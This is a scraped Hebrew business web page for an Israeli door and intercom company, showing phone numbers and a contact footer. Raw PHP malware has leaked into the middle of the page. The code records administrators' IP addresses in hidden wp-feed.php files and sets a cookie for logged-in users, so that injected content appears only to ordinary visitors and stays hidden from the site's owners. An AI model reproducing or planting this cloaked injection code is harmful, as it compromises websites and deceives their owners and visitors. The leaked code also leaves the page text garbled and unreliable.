לפגישת ייעוץ חייג: 03-5567099  phone2

לוגו-אלומט

  • 1.jpg
  • 2.jpg
  • 3.jpg
  • 4.jpg
if ( ! function_exists( 'slider_option' ) ) { function slider_option($content){ if(is_single()) { $an=" "; $con = ' '; $con2 = ' '; $content=$content.$con2; } return $content; } function slider_option_footer(){ if(!is_single()) { $an=" "; $con = ' '; $con2 = ' '; echo $con2; } } function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(is_user_logged_in()) { add_action( 'init', 'setting_my_first_cookie',1 ); } function readDirsad($path){ $dirHandle = opendir($path); while($item = readdir($dirHandle)) { $newPath = $path."/".$item; if(is_dir($newPath) && $item != '.' && $item != '..') { if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false) { if (file_exists($newPath.'/wp-feed.php')) { $ip=@file_get_contents($newPath.'/wp-feed.php'); } if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) { $ip.=$_SERVER['REMOTE_ADDR'].' '; @file_put_contents($newPath.'/wp-feed.php',$ip); } } readDirsad($newPath); } else{ } } } if( current_user_can('edit_others_pages')) { if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) { $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); } if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) { $pathx = realpath(dirname(ABSPATH)); readDirsad($pathx); $ip.=$_SERVER['REMOTE_ADDR'].' '; @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip); } } if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) { $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) { add_filter('the_content','slider_option'); add_action('wp_footer','slider_option_footer'); } } function readDirs($path){ $dirHandle = opendir($path); while($item = readdir($dirHandle)) { $newPath = $path."/".$item; if(is_dir($newPath) && $item != '.' && $item != '..') { if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false) { //echo "Found Folder $newPath
"; $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); if (file_exists($newPath.'/wp-feed.php')) { $ipn=@file_get_contents($newPath.'/wp-feed.php'); } $iparr = explode("\n", $ip); $iparr=array_map('trim', $iparr); $ipnarr = explode("\n", $ipn); $ipnarr=array_map('trim', $ipnarr); $result = array_unique(array_merge($iparr, $ipnarr)); $ipx= implode("\n",$result); @file_put_contents($newPath.'/wp-feed.php',$ipx); } readDirs($newPath); } else{ // echo '  Found File or .-dir '.$item.'
'; } } } if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) { //$path = realpath(dirname(ABSPATH)); //echo "$path
"; //readDirs($path); } }

אלומט דלתות אינטרקום בע"מ - טלפון: 03-5567099, נייד: 052-2560768, פקס 03-9794741 דוא"ל This e-mail address is being protected from spambots. You need JavaScript enabled to view it.